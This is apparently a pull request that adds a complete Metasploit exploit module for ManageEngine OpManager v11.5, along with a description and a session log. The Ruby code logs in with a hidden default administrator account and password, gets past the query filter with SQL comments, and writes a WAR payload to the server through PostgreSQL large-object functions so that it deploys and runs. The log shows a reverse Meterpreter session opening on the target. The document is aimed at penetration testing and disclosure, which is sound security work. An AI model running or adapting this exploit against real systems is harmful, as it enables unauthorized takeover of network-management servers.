### PR TITLE
ManageEngine OpManager Remote Code Execution

### DIFF
--- a/modules/exploits/windows/misc/manageengine_opmanager_rce.rb
+++ b/modules/exploits/windows/misc/manageengine_opmanager_rce.rb
@@ -1,0 +1,177 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine OpManager Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a default credential vulnerability in ManageEngine OpManager.
+        The vulnerability exists because a default hidden account "IntegrationUser" with administrator
+        privileges is shipped with every installation of ManageEngine OpManager. The account has
+        a default password of "plugin", which can not be reset through the OpManager user interface.
+        By logging in and abusing the default administrator's SQL query functionality, it's possible
+        to write a WAR payload to disk and trigger an automatic deployment of this payload.
+        This module has been tested successfully on OpManager v11.5 for Windows. },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '38174' ],
+        ],
+      'Platform'       => ['java'],
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          ['ManageEngine OpManager v11.5', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 14 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptInt.new('WAIT', [true, 'Seconds to wait for WAR deployment', 15]),
+        ], self.class)
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    # Check version
+    vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, "LoginPage.do")
+    })
+
+    if res && res.code == 200 && res.body =~ /v\.([0-9]+\.[0-9]+)<\/span>/
+      version = $1
+      if version.to_f <= 11.5
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Safe
+      end
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def sql_query( key, query )
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, "api", "json", "admin", "SubmitQuery"),
+      'vars_get' => { 'apiKey' => key },
+      'vars_post'   => { 'query' => query }
+    })
+
+    if not res or res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")
+    end
+
+    return res
+  end
+
+  def exploit
+    print_status("#{peer} - Access login page")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, "jsp", "Login.do"),
+      'vars_post' => {
+        'domainName' => 'NULL',
+        'authType' => 'localUserLogin',
+        'userName' => 'IntegrationUser', # Hidden user
+        'password' => 'plugin' # Password of hidden user
+      }
+    })
+
+    if res && res.code == 302
+      redirect =  URI(res.headers['Location']).to_s.gsub(/#\//, "")
+      print_status("#{peer} - Location is [ #{redirect} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
+    end
+
+
+    # Follow redirection process
+    print_status("#{peer} - Following redirection")
+    res = send_request_cgi({
+      'uri' => "#{redirect}",
+      'method' => 'GET'
+    })
+
+    if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
+      api_key = $1
+      print_status("#{peer} - Retrieved API key [ #{api_key} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
+    end
+
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+    war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')
+
+    print_status("#{peer} - Executing SQL queries")
+
+    # Remove large object in database, just in case it exists from previous exploit attempts
+    sql = "SELECT lo_unlink(-1)"
+    result = sql_query(api_key, sql)
+
+    # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
+    sql = "SELECT lo_create(-1)"
+    result = sql_query(api_key, sql)
+    if result.body =~ /lo_create":([0-9]+)}/
+      loid = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
+    end
+
+    # Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.
+    sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{loid}, 0, DECODE('#{war_payload_base64}', 'base64'))"
+    sql_query(api_key, sql)
+
+    # Export our large object id data into a WAR file
+    sql = "SELECT lo_export(#{loid}, '..//..//tomcat//webapps//#{app_base}.war');"
+    sql_query(api_key, sql)
+
+    # Remove our large object in the database
+    sql = "SELECT lo_unlink(-1)"
+    result = sql_query(api_key, sql)
+
+    print_status("#{peer} - Waiting #{datastore['WAIT']} seconds for WAR deployment")
+    sleep(datastore['WAIT'])
+
+    register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
+    register_file_for_cleanup("tomcat//webapps//#{app_base}")
+
+    random_jsp = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp'
+    print_status("#{peer} - Executing Payload")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, app_base, "#{random_jsp}"),
+    })
+
+    # If the server returns 200 and the body contains our payload name,
+    # we assume we uploaded the malicious file successfully
+    if not res or res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - WAR File wasn't deployed, aborting!")
+    end
+
+  end
+
+end


### PR DESCRIPTION
This module exploits ManageEngine 11.5 and lower by abusing a default hardcoded/hiden account to login. After login SQL queries are executed on the PostgreSQL backend to write a WAR payload which gets deployed and executed to provide a shell.

Download ManageEngine OpManager from: https://www.manageengine.com/network-monitoring/29809517/ManageEngine_OpManager_64bit.exe
Run the installer and keep everything default (Tested on a Windows 7 64-bit VM)

Run the exploit module:

msf > use exploit/windows/misc/manageengine_opmanager_rce
msf exploit(manageengine_opmanager_rce) > set RHOST 192.168.2.114
RHOST => 192.168.2.114
msf exploit(manageengine_opmanager_rce) > exploit

[*] Started reverse handler on 192.168.2.123:4444
[*] 192.168.2.114:80 - Access login page
[*] 192.168.2.114:80 - Location is [ http://192.168.2.114/apiclient/ember/index.jsp;jsessionid=698B06002D027120A10939A22E11341D ]
[*] 192.168.2.114:80 - Following redirection
[*] 192.168.2.114:80 - Retrieved API key [ 28ca11465b29e2fe38d232bcadbf2ab9 ]
[*] 192.168.2.114:80 - Executing SQL queries
[*] 192.168.2.114:80 - Waiting 15 seconds for WAR deployment
[*] 192.168.2.114:80 - Executing Payload
[*] Sending stage (47694 bytes) to 192.168.2.114
[*] Meterpreter session 3 opened (192.168.2.123:4444 -> 192.168.2.114:49466) at 2015-09-12 17:08:50 +0700
[+] Deleted tomcat//webapps//TaNg.war
[!] This exploit may require manual cleanup of 'tomcat//webapps//TaNg' on the target

meterpreter >
